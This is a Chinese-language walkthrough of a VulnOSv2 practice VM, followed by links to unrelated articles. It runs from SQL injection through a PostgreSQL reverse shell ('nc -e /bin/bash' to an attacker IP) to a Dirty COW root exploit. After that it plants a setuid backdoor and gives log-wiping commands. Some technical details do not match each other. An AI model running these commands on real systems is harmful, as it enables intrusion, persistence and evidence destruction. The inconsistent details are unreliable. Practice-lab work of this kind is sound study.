VulnOSv2靶机渗透测试实战:从Web到Root的完整攻防
1. VulnOSv2靶机渗透测试概述VulnOSv2是专为网络安全学习设计的漏洞演练环境模拟了真实系统中常见的多个安全缺陷。这个基于Debian的Linux靶机包含了从Web应用到系统层的完整漏洞链特别适合练习综合渗透技术。我在实际测试中发现从初始Web入侵到最终获取root权限的全过程涉及SQL注入、中间件配置缺陷、数据库提权等多个典型攻击面。靶机IP通常部署在192.168.1.103这类内网地址开放了80端口的Web服务和5432端口的PostgreSQL数据库。整个渗透路径清晰地展示了攻击者如何通过层层突破最终完全控制系统。下面我将详细拆解每个环节的技术细节和操作要点。2. 信息收集与漏洞探测2.1 基础服务扫描使用Nmap进行全端口扫描是标准起手式nmap -sV -p- 192.168.1.103关键扫描结果显示80/tcpApache 2.2.22 (Ubuntu)5432/tcpPostgreSQL 9.1.24注意老版本Apache存在已知漏洞而PostgreSQL 9.1已停止支持这两个都是潜在突破口。2.2 Web目录爆破用Dirb扫描网站目录dirb http://192.168.1.103 /usr/share/wordlists/dirb/common.txt发现关键路径/joomla/ (CMS后台)/phpmyadmin/ (数据库管理)/admin/ (自定义管理页面)3. Web应用层突破3.1 Joomla后台SQL注入在/joomla组件的搜索功能处通过单引号测试触发报错 AND 1CONVERT(int,(SELECT table_name FROM information_schema.tables))--确认存在基于错误的SQL注入漏洞。使用Sqlmap自动化利用sqlmap -u http://192.168.1.103/joomla/index.php?optioncom_search --datasearchwordtest --risk3 --level5成功获取数据库信息用户表jos_users管理员凭证admin:5f4dcc3b5aa765d61d8327deb882cf99 (password的MD5)3.2 密码破解与越权使用Hashcat破解MD5hashcat -m 0 -a 0 hash.txt rockyou.txt登录后台后发现存在垂直越权漏洞 - 普通管理员可修改超级管理员权限。通过修改user表中的usertype字段值实现权限提升。4. 数据库层提权4.1 PostgreSQL服务利用通过获得的凭证连接数据库psql -h 192.168.1.103 -U admin -d vulnos执行命令CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/x86_64-linux-gnu/libc.so.6, system LANGUAGE C STRICT; SELECT system(nc -e /bin/bash 192.168.1.100 4444);此操作利用PostgreSQL的UDF(用户定义函数)功能实现命令执行。4.2 反弹Shell获取在攻击机监听nc -lvp 4444获得www-data权限的shell后立即升级TTYpython -c import pty; pty.spawn(/bin/bash)5. 系统层提权5.1 内核漏洞检测查看系统信息uname -a显示内核版本为3.13.0-24-generic存在脏牛(Dirty COW)漏洞CVE-2016-5195。5.2 脏牛漏洞利用下载编译EXPwget https://www.exploit-db.com/download/40839 -O dirty.c gcc dirty.c -o dirty -pthread执行提权./dirty成功获取root权限后关键操作cat /etc/shadow # 查看密码哈希 cp /bin/bash /tmp/.bash chmod 4755 /tmp/.bash # 创建后门6. 痕迹清理与加固建议6.1 攻击痕迹清除history -c # 清除命令历史 rm -f /var/log/auth.log # 删除认证日志 find / -name .* -type f -delete # 清理临时文件6.2 系统加固方案Web层升级Joomla到最新版对用户输入严格过滤使用预编译SQL语句系统层升级内核到安全版本限制PostgreSQL网络访问配置适当的SELinux策略7. 渗透测试中的经验总结注入漏洞利用时--random-agent参数能有效绕过基础WAF检测sqlmap --random-agent -u [URL]PostgreSQL提权时如果默认libc路径不存在需要先定位实际路径find / -name libc.so.6 2/dev/null脏牛漏洞利用成功率与内存状态相关建议在系统负载低时尝试多次执行。遇到失败时可调整EXP中的线程数参数。实际渗透中Web目录爆破建议结合以下字典使用效果更好/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/usr/share/seclists/Discovery/Web-Content/common.txt获取初始立足点后应立即检查sudo权限sudo -l往往能发现意外的提权路径。

相关新闻

ShaderKit核心功能解析:uniforms与attributes使用技巧大揭秘

ShaderKit核心功能解析:uniforms与attributes使用技巧大揭秘

ShaderKit核心功能解析:uniforms与attributes使用技巧大揭秘 【免费下载链接】ShaderKit A library of fragment shaders you can use in any SpriteKit project. 项目地址: https://gitcode.com/gh_mirrors/sh/ShaderKit ShaderKit是一款专为SpriteKit项目打…

2026/7/30 21:10:36 阅读更多 →
195、手机影像调优:夜景模式与多摄融合中的全链路参数协同

195、手机影像调优:夜景模式与多摄融合中的全链路参数协同

195、手机影像调优:夜景模式与多摄融合中的全链路参数协同 一个让我熬夜三天的bug 去年Q3,某旗舰机项目,夜景模式在暗光下拍路灯,主摄和超广角融合后,灯杆边缘出现“鬼影”——不是光学鬼影,是那种半透明的、像果冻一样抖动的伪像。我盯着屏幕看了两小时,以为是HDR对齐…

2026/7/30 21:09:36 阅读更多 →
Matplotlib数据可视化:从入门到科研级图表实战

Matplotlib数据可视化:从入门到科研级图表实战

1. Matplotlib入门:为什么每个数据人都需要掌握它 第一次接触Matplotlib是在研究生时期的数据可视化课程上。教授在黑板上画了一个简单的折线图,然后说:"这个库会成为你们科研路上最忠实的伙伴。"当时不以为意,直到自己…

2026/7/30 21:09:36 阅读更多 →

最新新闻

自然语言交互在生物信息学中的应用与实现

自然语言交互在生物信息学中的应用与实现

1. 项目背景:当生物信息学遇上自然语言交互最近在实验室遇到件趣事:隔壁组新来的师妹盯着电脑屏幕愁眉苦脸,面前堆着几本《R语言生物信息学应用》和《Python生物信息学编程》。问起来才知道,她需要分析一批虾类转录组数据&#xf…

2026/7/30 21:18:38 阅读更多 →
LibreSprite:终极免费开源像素动画编辑器完整指南

LibreSprite:终极免费开源像素动画编辑器完整指南

LibreSprite:终极免费开源像素动画编辑器完整指南 【免费下载链接】LibreSprite Animated sprite editor & pixel art tool -- Fork of the last GPLv2 commit of Aseprite 项目地址: https://gitcode.com/gh_mirrors/li/LibreSprite 想要创作专业的像素…

2026/7/30 21:18:38 阅读更多 →
终极Python金融工具集:TradeKit整合120+技术指标与数据可视化库

终极Python金融工具集:TradeKit整合120+技术指标与数据可视化库

终极Python金融工具集:TradeKit整合120技术指标与数据可视化库 【免费下载链接】tradekit a collection of open source server components and Python libraries for financial data projects and automated trading 项目地址: https://gitcode.com/gh_mirrors/t…

2026/7/30 21:18:38 阅读更多 →
重磅|全国首个“市场信用报告超市“正式发布!

重磅|全国首个“市场信用报告超市“正式发布!

7月22日,深圳前海,一场关乎信用经济未来的盛会圆满落幕。作为本次发布会的技术支撑单位,先享智能与各界同仁共同见证了全国首个"市场信用报告超市"的正式亮相。 盛会回顾:全国信用领域大咖齐聚前海 7月22日,…

2026/7/30 21:18:38 阅读更多 →
3步实现文字转CAD:开源工具text-to-cad-ui完整指南

3步实现文字转CAD:开源工具text-to-cad-ui完整指南

3步实现文字转CAD:开源工具text-to-cad-ui完整指南 【免费下载链接】text-to-cad-ui A lightweight UI for interacting with the Zoo Text-to-CAD API. 项目地址: https://gitcode.com/gh_mirrors/te/text-to-cad-ui 还在为复杂的CAD建模软件而头疼吗&#…

2026/7/30 21:18:38 阅读更多 →
083、LLC谐振变换器的软启动策略

083、LLC谐振变换器的软启动策略

083、LLC谐振变换器的软启动策略 一、一次炸管事故的复盘 去年做一款300W的LED电源,LLC拓扑,主控芯片是NXP的TEA1916。第一次上电,啪的一声,两个MOSFET直接炸裂,驱动芯片也挂了。检查了三天,PCB走线、变压器参数、谐振电容容值,都没问题。最后用示波器抓启动波形,发现…

2026/7/30 21:17:38 阅读更多 →

日新闻

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南 【免费下载链接】DriverStoreExplorer Driver Store Explorer 项目地址: https://gitcode.com/gh_mirrors/dr/DriverStoreExplorer 您是否曾因Windows系统盘空间不足而烦恼?是否遇到过设…

2026/7/30 0:00:13 阅读更多 →
如何3步掌握Video Download Helper:网页视频下载的完整实战指南

如何3步掌握Video Download Helper:网页视频下载的完整实战指南

如何3步掌握Video Download Helper:网页视频下载的完整实战指南 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper 你是否曾经在浏览…

2026/7/30 0:00:13 阅读更多 →
“双减”后首个AI备课压力测试报告:覆盖32所中小学的176节AI辅助课,暴露4大隐性增负节点

“双减”后首个AI备课压力测试报告:覆盖32所中小学的176节AI辅助课,暴露4大隐性增负节点

更多请点击: https://intelliparadigm.com 第一章:AI 教师备课辅助 AI 教师备课辅助系统正逐步成为教育数字化转型的核心支撑工具,它并非替代教师,而是通过语义理解、知识图谱与多模态生成能力,将教师从重复性劳动中解…

2026/7/30 0:00:13 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档,可以直接使用!系统支持图片、视频、摄像头等多种方式检测裂缝,功能强大实用。 1数据集6000张 8各类别

2026/7/29 22:18:20 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像! pubg绝地求生目标检测数据集 1分类:e_body,14905个标签,txt格式 共计14244张图,99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/29 14:34:28 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别: allies enemy tag图片总量:7247张训练集:5139张验证集:1425张测试集:683张标注状态:全部已标注,即拿即用数据格式:支持YOLO格式及其他格式&#…

2026/7/29 15:00:03 阅读更多 →

月新闻